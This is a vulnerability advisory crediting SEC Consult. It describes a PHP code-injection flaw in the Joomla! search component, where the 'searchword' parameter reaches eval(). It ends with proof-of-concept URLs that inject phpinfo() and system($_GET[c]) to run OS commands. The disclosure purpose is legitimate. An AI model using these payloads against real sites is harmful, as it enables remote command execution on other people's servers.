Joomla! is "an award-winning Content Management System (CMS) that will help you build websites and other powerful online applications. Best of all, Joomla! is an open source solution that is freely available to everybody. Joomla! is used all over the world to power everything from simple, personal homepages to complex corporate web applications". The search component of Joomla! allows an attacker to execute arbitrary PHP commands. It is e.g. possible to execute OS commands via system() calls. PHP is set to the settings recommended by the Joomla! installer.
Credit:
The information has been provided by Johannes Greil / SEC Consult.
Input of the "searchword" parameter is being passed to the mentioned eval() code and executed. An attacker is able to append new PHP commands after the "echo" language construct which can be used for OS command execution.
In order to bypass the search word length limitation of 20 characters a new GET parameter is being used to specify the OS commands (see proof of concept).
Proof of concept: http://$joomlahost/index.php?searchword=";phpinfo();%23&option=com_search&Itemid=1
http://$joomlahost/index.php?c=id&searchword=";system($_GET[c]);%23&option=com_search&Itemid=1
